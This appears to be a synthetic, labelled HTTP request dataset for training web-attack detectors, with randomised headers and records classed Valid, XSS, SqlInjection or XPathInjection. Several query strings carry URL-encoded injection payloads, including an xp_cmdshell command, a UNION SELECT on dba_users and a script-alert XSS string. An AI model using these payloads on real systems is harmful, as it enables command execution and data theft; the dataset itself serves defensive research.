If-Range: Thu, 14 Jan 10 24:07:43 UTC
Max-Forwards: 9001
MIME-Version: 3.8
Pragma: xernoile=haePa
Proxy-Authorization: NTLM ZUkxZXlvcnNhbjhhcmVpYTNsbGhhMWZsb3NodjVmZjRyYXY3
Authorization: Digest nc=8DfF3dea
Range: 8896-28646
Referer: /biofcan/no4csooi.swf
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: urrNdRhmd
UA-CPU: PowerPC
UA-Disp: 821,9658,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1569x604
Via: 9.0 80.212.232.26
Transfer-Encoding: nlne; hmgtci1e=SyEfaIwj
Upgrade: 94q/7.8, xee/9.4, reehgp/6.0
Warning: 783 107.227.6.97 "3ldiullnaotesre" 
X-Forwarded-For: 184.221.151.22
X-Serial-Number: 4249614312362158832
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29247
Start - Id: 35588
class: XPathInjection
GET /7ienhfnngoersfei/2yBM_qVt/erYi/bZiqFMVMh/uTos5so1/ogdWmhUcy2mnd.js?z0adebiht=emaimait85i8iacae&lllTWqos=tOcGDj&e07to=eedanLnewe&ih=ldy%2Biua&0sEniwrielr=dn&4pOoEecciche=odnte%26%5C%272ctt89&ueeeeeaefUsi=%28i++++%3C++count%28zeofol%2Fchild%3A%3Atext%28%29%29+and++++j+++%3C+++++count%28sde%2Fchild%3A%3Acomment%28%29%29++and+k++++%3C+++++count%28enbnae%2Fchild%3A%3A*%29++%29&aoFSsttb=3394&6CMOs=2&esUe=a5sa&lwaEegsdengzbi=38045&lerigckenczlGet=aesudrMtAo&V0OVEnDdPa.d=mabpnn%25da%3Dtmp+ HTTP/1.0
Host: www.2torcne.st
Connection: close
Accept: video/*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 146.199.243.126
Cookie: oreeinzeto4r8e=eoytn;gthmeep=ptdsId;triSOciurzkett=o-OJqtDGNqA;nhuqx=0;9rteazee=tf-J.i5fA;uvVqmc=Ose
Cookie2: $Version="8"
Date: Thu, 25 Jun 09 03:35:34 UTC
ETag: W/"hI@P2lhb.9ij7_jV"
Expect: 100-continue
From: keef8S@qicoiNe.be
If-Modified-Since: Tue, 22 Nov 05 17:52:05 CET
If-Unmodified-Since: Mon, 27 Apr 09 09:40:51 UTC
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: "ROUscR3pkmOD.leDa"
If-Range: Tue, 21 Feb 06 19:09:43 CET
Max-Forwards: 32
MIME-Version: 4.7
Pragma: 5e=shda
Proxy-Authorization: NTLM aWFlZHB1b2dlbTFlNHoydWFhcmNvb3dhcmVtY2xmMWdmczB0ZWxuZWZwb2Y=
Authorization: Basic bnNmc2k6MnAzYWM=
Range: 1278-6
Referer: /aslihieO/ywthrjr/wonmadn/hhNh/y0t0etIo.nsf
TE: chunked;q=0.3
User-Agent: Mozilla/8.7 (compatible; Konqueror/5.2; Mac OS X; rrkr; 81ansl; shetakee)
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 468x391
Via: HTTP/2.1 www.ndeot.png, 6.2 www.momfs2ti.shtml, FTP/4.7 218.225.175.124
Transfer-Encoding: compress
Upgrade: anfbe/0.9, m2ntt/2.0
Warning: 764 www.estd.html "reyeebllnhmEobh" 
X-Forwarded-For: 245.111.237.199
X-Serial-Number: 65275952070459353
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35588
Start - Id: 13888
class: Valid
GET /theg0aevonsiHy9o8t/rite7epsiiayo0r/rrjU-jbUQY0gOaL/iecRe5cr5ddhilstih/2eI.swf?t1btcanesR9whk=aioed%5Dny-e%2Foho&A45wZTp=ts1_mPu HTTP/1.0
Host: www.rfaim.com
Connection: dnfoc
Accept: */*
Accept-Charset: euc-jp;q=0.2, koi8;q=0.9, iso-2022-kr
Accept-Encoding: *;q=0.2
Accept-Language: 9dazTIr-onote;q=0.7, e-oc8kl;q=0.6, eMe-rgfMq, no-ieWbys
Cache-Control: n=eEuta
Client-ip: 174.37.26.127
Cookie: soenvoeasoteyab=ryH0phto;ukAafevs=n4Py;o8EsactmDe3=);insertcmddTzmAD=28;nooi=11571
Cookie2: $Version="602"
Date: Thu, 03 Jun 04 06:00:40 UTC
ETag: W/"UzkU53@-de6bwowOH7ON"
Expect: 100-continue
From: aopeat@lwiRaar.be
If-Modified-Since: Sun, 19 Apr 09 07:33:23 UTC
If-Unmodified-Since: Thu, 26 Nov 09 07:56:42 UTC
If-Match: *
If-None-Match: "fxi7D.JQ9g0ZMix"
If-Range: Mon, 21 May 07 24:39:55 UTC
Max-Forwards: 44
MIME-Version: 9.2
Pragma: dwsl5=ddsf
Proxy-Authorization: 69sr aeSoonsr=ixten
Authorization: Basic dHVkb0U6YU13ZA==
Range: -52,788-774
Referer: http://Cmngb.com/eme0JsL/es0oQ.txt
TE: deflate,trailers,trailers
Trailer: Range
User-Agent: Mozilla/4.5 (X11; U; Open BSD i386 7.4; a4-c3; rv:6.3.9) Gecko/35905425
UA-CPU: StrongARM
UA-Disp: 4060,2972,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7739x7906
Via: 5naiM/0.7 www.tInneta.html
Transfer-Encoding: ctmr7
Upgrade: ujteh/5.0, sh2/9.2, nct9Z/8.1
Warning: 098 16.209.158.37 "jtcOeZythsytt9zaQlpa" "Sat, 23 Jul 05 18:39:08 GMT"
X-Forwarded-For: 150.165.127.46
X-Serial-Number: 02052575004924
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13888
Start - Id: 11178
class: Valid
GET /id8hLituhhnie/aitufey1hyimeceTitec/W3FAexecyi2DkIM/metaZlocationBRpOunionp_QFE/e3d0Z@8P/tbuEN6yoU07/c.0Bip_HoM/pI/yMber/sV2q.css?eoErEdaess=qiyC0qne2yaDsjx&th=pk1Cl1vfG0Qo&KperlCnode=7969990898&theehntbi1oep=30&h0osDsoeWxh=oFQ&le=745&O5=261&cEezat9aeyperh=arr&IvE-w=1213&aeffl1ssHirly=004&txax=0027&HkHpCp2n=tOafqHku HTTP/1.1
Host: 210.148.147.110
Connection: fte4ldul
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 25.22.135.228
Cookie: ispy=7g;esl=9ua;w;fnococpH=oWzuZ.
Cookie2: $Version="235"
Date: Sat, 21 Feb 04 24:10:45 GMT
ETag: W/"FNh84PSplg7zFNa"
Expect: 100-continue
From: exRkrsa@Adzgatioo.net
If-Modified-Since: Sat, 21 Apr 07 24:45:14 UTC
If-Unmodified-Since: Sat, 08 Apr 06 09:27:28 CET
If-Match: *
If-None-Match: "TTdH7sdzwCe5eXH6M0U"
If-Range: Mon, 16 May 05 10:25:12 CET
Max-Forwards: 75
MIME-Version: 2.4
Pragma: awdns=Lta
Proxy-Authorization: Basic Ym9pZWhhOjRueWU1enN0
Authorization: psJcu ei5Dhfa=Oenrgwc
Range: 01809-,9808-,-723
Referer: http://Ti1y.it/ljis7Uai/agtchtr/uqoso.asp
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/0.6 (X11; U; Unix 1.7; ii-e3; rv:4.6.1) Gecko/73304159
UA-CPU: StrongARM
UA-Disp: 473,1490,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0885x0139
Via: 6.3 248.152.95.206, 0.6 189.82.35.112
Transfer-Encoding: gzip
Upgrade: aSraw/8.9, oumeo/3.1, 3alN/4.2, Kirn/2.1, txon/6.0
Warning: 587 29.152.16.59 "sKvi" "Sat, 16 Jul 05 05:54:58 CET"
X-Forwarded-For: 199.166.24.178
X-Serial-Number: 400472964333803
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11178
Start - Id: 1292
class: Valid
GET /slIBXKg/0oe0r4beefcaet/t6ffEGcWdrw@qGP/4y3pdu/se/HmgieteOnwR.nsf?7gvh4nrch=cWyrqDSKA&llhk8=lat1+mgoh&rvB-n6ym5d=akedNeltftnhpletis&ot8K2criosIx1=H9&zeees3rfn3=8&nehstrhttsx=78&K1j8EU89log3F=924509&1uhgs3fhnwowe=dHML&obl=bhU.vjw&arareinhwoaaz6U=nbLu&2esIdzoees=toe+&hBt4dr=4pw5W HTTP/1.0
Host: www.drebutq1.org:91152
Connection: keep-alive
Accept: */*
Accept-Charset: gb2312;q=0.6
Accept-Encoding: deflate, deflate;q=0.9, deflate;q=0.5
Accept-Language: geosntt-woeieyw, fiytgk3s-Xes, deeitua-l6;q=0.9, cv-c;q=0.2, Yt5r-du
Cache-Control: max-age=5
Client-ip: 112.229.186.37
Cookie: VHp5jiifuouo9ie=54216;egts0smTfesmne=tpntiLl;feeeepea6itya=chi
Cookie2: $Version="8"
Date: Mon, 12 Mar 07 01:18:41 CET
ETag: "cAQxZjSt-Ai5X84b6y"
Expect: tnaaw=wirsioe
From: o2yoIi@nrSybWihss.biz
If-Modified-Since: Fri, 30 Jan 09 01:33:48 GMT
If-Unmodified-Since: Fri, 21 Jul 06 06:16:00 UTC
If-Match: "PtUR9hcy.wLoq6nrw"
If-None-Match: *
If-Range: "jOaQWMUi1MPcr05Rsc"
Max-Forwards: 59
MIME-Version: 7.7
Pragma: el='shQp'
Proxy-Authorization: NTLM N21ybW9TZ2Ezb2hsb2FPczV0Z2VuOHQybHJlaWdtbm8ybHM=
Authorization: NTLM YWl0ZWl0eGJoZnpSbmhlYXJwcm10b2ltbGVubjlLcnJlcXhvb2xBYXVlMmlZYWU1
Range: 282-,2-77614,032140-
Referer: /hseei8r/4szcec9/eiskn/ibedtzm.jsp
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/2.6 (Machintosh; U; PPC 9.0; wi-er; rv:5.7.3) Gecko/85946840
UA-CPU: PowerPC
UA-Disp: 893,913,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7486x696
Via: 0.5 www.3nnv1ija.shtml:37, HTTP/9.1 89.119.221.149
Transfer-Encoding: gzip
Upgrade: mtc/2.4, 2tb/3.3, uMmd0b/9.5, oua/7.8, sdtbe/1.8
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 47.248.188.232
X-Serial-Number: 67843918306515180
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1292
Start - Id: 29835
class: Valid
GET /toU@6377T0C/cQMGYjgyvcU_.YP/NBrcVc/p21v5/tETU4zH4K.UbP.exe?ZQg0QrVselect=sjE7yooioasllt&oceuc=services%27%3E&CiQ=l&sr=%27ssw+a+coten&ln=rp1oenlNevale%5Dn&Xl6rplog4vWbdrop=34&zLwgetexecmmxESHZJ=l9eM4aahtcahts&7xnlZlor1o9dm=eoii4&AxTh=00903&on651n=jmdb HTTP/1.0
Host: www.tmerdgltl.com:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1253, x-mac-hebrew, hz-gb-2312;q=0.0
Accept-Encoding: deflate;q=0.6
Accept-Language: nHue-msboz, etuq-qSedgeaa, otIt2-ytar8sou;q=0.2, giet-us, i9eoi8q-L8alqQi;q=0.3
Cache-Control: only-if-cached
Client-ip: 35.8.31.158
Cookie: me3nwroqeiftbL2=S6ni5ode4ahodwHe;RHdocumentecholetcBydivC7J=adminairwhcpr?ajgs
Cookie2: $Version="7"
Date: Sat, 30 Apr 05 07:35:07 UTC
ETag: "g5A9lbqV99VONZA"
Expect: neu2n
From: rbldtdG@o7aniAtsO.ch
If-Modified-Since: Wed, 24 May 06 02:03:15 UTC
If-Unmodified-Since: Tue, 10 Apr 07 15:14:46 GMT
If-Match: "FfK8MGlMtMIx7PM"
If-None-Match: *
If-Range: Mon, 02 Nov 09 04:06:00 GMT
Max-Forwards: 448
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: msfja kissaf=Rn4lrtpj
Authorization: czmvs lP3al=6ehaeow
Range: 9669-56204,57635-,19451-
Referer: http://Y25nyne.ch/ya8v/wq7pr/sg37Qt9c.jpeg
TE: deflate,trailers,chunked
Trailer: Expect
User-Agent: eqas69O (pFY8u_; eQ2Id7k; d3CrQhK; rpBWyyj; izseTu)
UA-CPU: x86
UA-Disp: 724,467,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 238x9907
Via: HTTP/3.5 www.ddoe7D.html, FTP/9.3 www.r7ba.shtml, fiay/7.1 170.71.190.133:88873
Transfer-Encoding: deflate
Upgrade: erOt/8.8, dtrg5/5.2, sO4/0.6, 1jiLT/0.8
Warning: 407 224.95.62.105 "a9tsaazcrsTjarhmoi" "Thu, 13 Jul 06 11:51:43 CET"
X-Forwarded-For: 121.62.194.6
X-Serial-Number: 59564326
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 29835
Start - Id: 47961
class: XSS
GET /irwn/fucnfinnti/l.60N/9i2WwS9DSybUu/cbZt5_hJVTa@LbPJsb/anmne.php3?3cLDMNISMW=330&etnarr3s9=046570&cuosltqi7iax=%3Cxml++++id++%3D++++%22+++++X+++++%22++%3E%3Ca+%3E%3Cb++++%3E%26lt%3Bscript++%3E%5Balert%28%27nxs%27%29%3B%5D%26lt%3B%2Fscript+%3E%3B%3C%2Fb++%3E%3C%2Fa%3E%3C%2Fxml++%3E&82jbbtseeoyao=oN9gr&k0Aojecchl0Wrlt=zSmcAOG&gt=lig&e0tfr2gdreO=7utrtepy%5C&XPMfVQ07=tydau8h3amctrd&qpy4i=5213 HTTP/1.0
Host: 251.112.94.11
Connection: teNia
Accept: video/*, video/mpeg, image/*;q=0.2
Accept-Charset: utf-7, iso-8859-1, euc-jp;q=0.9, euc-cn
Accept-Encoding: 
Accept-Language: th-0TAgwy;q=0.3, es-yhowlh, tcpqe-tight4rd, sEor-r9an
Cache-Control: max-age=94
Client-ip: 234.54.187.109
Cookie: WGO-UokpkdC=8677479;1eaiexmozpb=;e;oedntylmrse=httpaesatsrci
Cookie2: $Version="32"
Date: Wed, 12 Nov 08 14:03:44 UTC
ETag: W/"Mw_-1Tt9@rmm-RMax"
Expect: 100-continue
From: e4le@beZlsQbrdn.de
If-Modified-Since: Mon, 19 Apr 10 16:52:33 UTC
If-Unmodified-Since: Tue, 19 Dec 06 12:31:41 UTC
If-Match: *
If-None-Match: "OiEfMBB6sHnf83S"
If-Range: *
Max-Forwards: 88
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest qop=auth
Range: -162,92-
Referer: http://otbuua.com/3soiuea/slHauU/qaseioDq/2mwhrw/tedad.sh
TE: deflate,trailers
Trailer: Expect
User-Agent: Mozilla/4.3 (Windows; U; WinNT 5.9; bn-td; rv:0.1.5) Gecko/90925903
UA-CPU: 68000
UA-Disp: 533,4650,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3364x532
Via: 6.5 75.242.192.14
Transfer-Encoding: gzip
Upgrade: tco/6.7, yt2ien/0.1, jit/2.8, ect/0.5, ket1t/7.7
Warning: 258 www.enaLrqsn.shtml "owbjsDoG4e" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 546551972
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47961
Start - Id: 41144
class: SqlInjection
GET /n1bdklr/oO0mkZkPxHluKK/anGxXFFxQkt/mebhe/en5cslnnyl1ljtTcAtyn.php3?Gfi=exec++xp_cmdshell++%27%22abreNhEnEH%22+++++%3E%3E+script.vbs%27&f8zYYY=e&eviitydptx1=948864&d6E36cAnerBd=56&gFpkN7bin=uA7&qoe3asymp=62&enxanbm2dno6iN0=794523&ecgtde=aidfhtg&lvepeVs3oeaetmf=nJC5W6TDa&Jfd7qH=9859&YiPCsUoftp=hhvtedetinhey5n&aeygttobyeip=opdCe0tnneeta&bgsoundYformeRB46ftpbN=eaDiAtheql&.U-bgCKV7=805902 HTTP/1.0
Host: www.dhaasx.gov
Connection: close
Accept: video/*;q=0.5
Accept-Charset: iso-2022-jp;q=0.8, iso-2022-jp;q=0.1, koi8-r
Accept-Encoding: gzip, compress;q=0.4
Accept-Language: trLkEo-tmats, slhte-esjex, brGogt-7ae;q=0.7, u4aWa-tarns
Cache-Control: no-transform
Client-ip: 39.199.57.125
Cookie: oelyb4nfnnuw=av-XxZFQC
Cookie2: $Version="645"
Date: Wed, 04 Nov 09 02:03:01 GMT
ETag: "3gWmZjep6Aga7L5S"
Expect: 100-continue
From: txaWstrh@gamw.fr
If-Modified-Since: Sat, 16 May 09 09:48:14 UTC
If-Unmodified-Since: Fri, 25 Nov 05 15:42:49 CET
If-Match: "@OvZOKpmLqwcNPhkkJu"
If-None-Match: "nUC7cg0DaWfxulHtq0f"
If-Range: *
Max-Forwards: 8065
MIME-Version: 7.8
Pragma: ooaq=noslBc
Proxy-Authorization: Basic dDlsN2UzOnJnZWUyZQ==
Authorization: NTLM ZDk3M3Rlcmg3a21wdXRuaWVobWlkb29VbG9nZWF5bUU=
Range: 70-3
Referer: /ilso.mdb
TE: gzip;q=0.4
Trailer: Date
User-Agent: Mozilla/5.4 (compatible; iarhityns; SunOS sun4u; yutlrtfk; ik3iuNIv)
UA-CPU: Sparc
UA-Disp: 952,1268,32
UA-OS: FreeBSD
UA-Color: color32
Via: HTTP/2.2 www.ZusTdn.shtml:377, HTTP/1.4 www.ypaa.css:2, 0.6 119.148.86.49
Transfer-Encoding: compress
Upgrade: ng6s/4.8, 4et/8.2
Warning: 458 www.anke2uT.gif "btsiteht9hIieeLwah" 
X-Forwarded-For: 169.105.19.193
X-Serial-Number: 566074493
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41144
Start - Id: 41563
class: SqlInjection
GET /2U5TFClTfc/allP/uN-jlz/o8gwPdnKr/z2/ytnsu9jTs7oifSNIz/tettoAuynjxhNtsnAli/sX.dll?smJfaccess_log0abetweenZzZDL=oUBkoUB_PbJ&eqaht=eval2ogwp-o%29+Tiontmpeyr2o%3D&sularp9ue=338031&ajnd2n=33&heecmiir6=chairs%27++++UN%2F**%2FION+++++SEL%2F**%2FECT+++++37esstsrif+++++FROM+dba_users++++WHERE+++++tb++++like++%27%2525 HTTP/1.1
Host: 150.82.44.201
Connection: lern
Accept: application/*;q=0.9, video/mpeg;q=0.5, audio/basic;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: eiaeo-psoszeta;q=0.6, MtseU-eoekmu, uTnl-9i3;q=0.6, ionkih-lytsL, lzemosea-orr9utm;q=0.1
Cache-Control: no-store
Client-ip: 22.16.9.166
Cookie: ATinputE9vbscript@yphpZXI=uzBJcerepdu;WsjaanisseesIy=ucbt5;X6eams=eeinputadhagieen4;taRlihdmUxasyh=nullshHeform di7sN;tuloarxm=s7gtsnis&l8;ttOe=SxelpnhDss
Cookie2: $Version="102"
Date: Mon, 05 Jan 04 18:04:43 CET
Expect: 100-continue
From: usaacy07@scsi6.be
If-Modified-Since: Thu, 28 Jan 10 09:51:00 CET
If-Unmodified-Since: Sun, 23 Dec 07 24:27:14 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 26 Apr 07 11:16:55 CET
Max-Forwards: 1249
MIME-Version: 3.9
Pragma: 1n=tn
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: 629953-,-3
Referer: /rOn65s.swf
TE: trailers
Trailer: Connection
User-Agent: nYU1aale4
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1852x515
Via: vjti2i/8.3 www.uRhR3ler.tiff:388, 5.5 www.hice.js
Transfer-Encoding: gzip
Upgrade: 1uitte/1.5, Ore6/5.0
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41563
Start - Id: 2099
class: Valid
GET /qZMMLkk2CNW-/eaeyeaf5/dde6tNweEees2/tinye3jIY1FRKz/4rGcWH.iPgJ9x/whdir8chpaph/ODwtPcopyHnb/1x/Fsr/sdoaaigoeh0wamraa/nuB5b5.gif?NJS.2GMaccept=+adminhtmpnx&enpyoqv=tqG.rFx6z&Qhl8BDyC=T+yc5raccess_log0or%2Fpinsert%40ofform&tesiykfmOEnur=i+3reuua&Cpcf=89&emayw9k7tex=3ggtn4optiitrl7Ea&i8gtis=bdD7RDXjYD-S&eht8qmtre5=Hcopyya- HTTP/1.0
Host: 116.151.150.236
Connection: keep-alive
Accept: application/postscript
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rm-ho;q=0.7, eq2t2n-lsttnnta, aeeopRni-ithehG;q=0.1, eue-eeoagsoi, Ewsoca6-d
Cache-Control: no-store
Client-ip: 152.109.97.244
Cookie: nipiseikzlUtmn=a8GbKD;ip=etcodocumentnw os
Cookie2: $Version="8"
Date: Mon, 30 Oct 06 12:22:03 UTC
ETag: W/"-I8UuyJiv8MYZeKGFrq"
Expect: 100-continue
From: Iosu@aert5hd.ch
If-Modified-Since: Fri, 10 Apr 09 04:35:42 GMT
If-Unmodified-Since: Wed, 27 May 09 20:14:24 UTC
If-Match: *
If-None-Match: *
If-Range: "PtEkq3D4UPvWWmRaebJ"
Max-Forwards: 1
MIME-Version: 0.9
Pragma: r6btwo=n
Proxy-Authorization: Digest nc=FCb0e6a1
Authorization: NTLM cmVoZWV3MnN4aDNNYWtsc2VlY3Nhem5oZGF6b3JldUVkdENlYXNlYWVpbXRhZXU=
Range: 621-,04-,-085540
Referer: http://www.aisil.fr/yegabi3/ktseu.zip
TE: trailers
Trailer: TE
User-Agent: Mozilla/2.1 (Windows; U; Windows NT 6.4; ta-a0; rv:5.3.4) Gecko/64329692
UA-CPU: Sparc
UA-Disp: 4115,383,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3159x969
Via: ftd/0.0 www.tja1slgC.tiff, dadr/4.6 www.biedsbta.tiff, 1.0 www.oeoigtne.gif
Transfer-Encoding: deflate
Upgrade: bnb/4.4, nesz/5.1
Warning: 176 192.65.47.200 "nii9pvEb56r" "Thu, 12 Nov 09 15:01:18 UTC"
X-Forwarded-For: 132.82.181.214
X-Serial-Number: 86831
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2099
Start - Id: 27373
class: Valid
GET /rppdlWEIna/nBe/bgn6ahd.pl?htpassJqXM2-=745 HTTP/1.1
Host: 136.186.203.246
Connection: close
Accept: image/*;q=0.7, application/*;q=0.5
Accept-Charset: iso-8859-8, euc-jp;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: teTaff='inoase'
Client-ip: 131.181.78.228
Cookie: hnhTcml9oetSA=2;hel3edterr0=40092685;Hoatqadze7d=psghe
Cookie2: $Version="9"
Date: Wed, 10 Sep 08 13:37:22 UTC
ETag: "Le2MTLIN3sOpapYZvi"
Expect: 100-continue
From: etr2@eeroi.de
If-Modified-Since: Sat, 24 Oct 09 14:22:32 GMT
If-Unmodified-Since: Tue, 14 Aug 07 09:41:36 UTC
If-Match: *
If-None-Match: *
If-Range: "S_.OgbssaE_LUF9_Y"
Max-Forwards: 8022
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: MeYm toondn=clnamd
Authorization: Basic d3NvcXllOnFzZW4=
Range: 5279-
Referer: http://www.leejgefw.org/esbztr.mpg
TE: gzip
Trailer: Expect
User-Agent: 8aenidda (ot1nVpJxj; o5JmQ@c; wJ6cCrw-qQ)
UA-CPU: MIPS
UA-Disp: 1340,675,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 9698x542
Via: 5.0 www.odsetWcE.htm
Transfer-Encoding: deflate
Upgrade: uroe/2.4, Rrt/3.7
Warning: 365 216.84.39.69 "lisohq8cHaNasanTe" 
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 32684294
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27373
Start - Id: 29781
class: Valid
GET /X7updateWX/3fP9l0kaIYRflCDhpr/esalaeod/BwadminFsamxpJvUz/K-dg0SXZ.gif?exec8mi70evaliRHzf=198&EaqHqortwt=dewiaphtimochaaot&fokinhia=90cRainl4c&esn3ltdetOaj=an&zoae=9&Jd2=jbju_ncTNU&eekaloaeeoas=4697020708 HTTP/1.0
Host: www.ui56o.biz
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1257, x-mac-chinesesimp
Accept-Encoding: *
Accept-Language: eekhbl-t;q=0.1
Cache-Control: 1dne7='edpn90'
Client-ip: 66.205.89.103
Cookie: ve=1;tneeemEfetxa=]Itya4=;Dseesaeusre=34
Cookie2: $Version="92"
Date: Wed, 19 May 04 19:42:49 UTC
ETag: "IX5Xjzs12LEu0kOPUkyM"
Expect: 3afhShae
From: mptr@19anuaa52a.net
If-Modified-Since: Sun, 01 Oct 06 13:42:40 CET
If-Unmodified-Since: Mon, 31 May 04 01:02:42 CET
If-Match: "XomgH1jG_XRnhYc1e_"
If-None-Match: "paGpWxUy8Mmv@y2FR"
If-Range: *
Max-Forwards: 9962
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest algorithm=Oeah
Authorization: 1Ap0r eet09eib=nuPft
Range: -02795
Referer: /dnra2j/Snsa0q/7nG1over.jsp
TE: trailers,chunked;q=0.1,trailers
Trailer: From
User-Agent: Mozilla/6.3 (Machintosh; U; PPC Mac OS X 8.4; is-uq; rv:1.1.9) Gecko/29328076
UA-CPU: Sparc
UA-Disp: 2709,734,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 2347x796
Via: HTTP/2.2 206.10.60.59, FTP/4.7 217.14.232.209, so0e/4.9 169.155.222.169
Transfer-Encoding: identity
Upgrade: hoc/9.0, nsaeuh/2.0
Warning: 362 90.215.221.94 "tdttdIet" 
X-Forwarded-For: 150.107.9.100
X-Serial-Number: 92915948163168
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29781
Start - Id: 8075
class: Valid
GET /DMfVGT/r1saeatrydl/rntMWwkczo1nN/Hoen9cmgj5oyhaa/vK/iuulajtpeico1u/ee1hcsiecOiuEso0kr/srxQ9A1pxEyiU/ZIcformmF./o-/93BjacmdSGj@B@ftpZ/aL@cmdhVfhaccess_logxp_mochax.nsf? HTTP/1.1
Host: www.eeet.de:68
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936;q=0.9, cp-932;q=0.1, euc-kr, iso-8859-9
Accept-Encoding: 
Accept-Language: gebia0iT-6c, tecrlMt-anr;q=0.0, h-lpoa9
Cache-Control: no-store
Client-ip: 46.19.87.106
Cookie: eh0ymao=Aea ;a18deti=hfa\a2htn4;fKn_1B=1hsMry
Cookie2: $Version="9"
Date: Wed, 14 Jan 09 14:17:57 UTC
ETag: W/"Vhn.Vwq0JpJkNWvOBSs"
Expect: osLtso=2nefgyEa
If-Modified-Since: Sat, 06 Mar 04 17:43:48 CET
If-Unmodified-Since: Thu, 22 Feb 07 16:44:26 UTC
If-Match: *
If-None-Match: "IJnMg@1-T1nC68v"
If-Range: Wed, 05 Jan 05 21:30:47 GMT
Max-Forwards: 8255
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="rhdeitne"
Authorization: sn0se weaTdj=cnixwb
Range: 96926-503180,-72
Referer: /hnoc/idoeC/iTil.jsp
TE: trailers,chunked,deflate
Trailer: Connection
User-Agent: OjoNud (tAKGxSL)
UA-CPU: StrongARM
UA-Disp: 4009,1990,32
UA-Color: color16
UA-Pixels: 782x8382
Via: Eot5/9.9 18.90.52.83, 9.5 www.7eeaaajc.jpg
Transfer-Encoding: gzip
Upgrade: qeatH/4.1, Oryi/4.8, osp/7.5
Warning: 742 www.5eiisbn6.jpg "s7nmb8eks7phhnpbq8e" "Thu, 28 Apr 05 22:22:02 GMT"
X-Forwarded-For: 247.192.186.78
X-Serial-Number: 74656
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8075
Start - Id: 30519
class: Valid
GET /sykuetensq7j0eetebsa/s4SCA/w_BXxTzOvjeIppiYxBFp/oclnsse/uBFJU/wp-GQ06x/ZajE0dservicesjSQwYKJ.nsf?d1a=502 HTTP/1.0
Host: 29.223.26.35
Connection: dnrU
Accept: image/*;q=0.4, image/jpeg
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: htmrnlti='lr'
Client-ip: 45.61.175.245
Cookie: RF5M0Q5libwv=18;m0hS6=ti.lAubmgg4Z;7hsttn=r8n;rwx8sa4lqcd= 3di
Cookie2: $Version="21"
Date: Tue, 21 Aug 07 13:06:26 UTC
ETag: "gAoh1dXS@b.aUzyorSs"
Expect: hseef1s=i5gaS
From: zzlwh@fLsr.de
If-Modified-Since: Sun, 25 Feb 07 24:46:23 GMT
If-Unmodified-Since: Tue, 01 Nov 05 08:17:33 GMT
If-Match: *
If-None-Match: "D6ux-b_S_T.jDLIkL5Bi"
If-Range: Tue, 31 Aug 04 11:38:35 GMT
Max-Forwards: 870
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic ZWUzcmk6ZW9oN2Vk
Authorization: cAnt enaT=eAcia
Range: 6-,-0
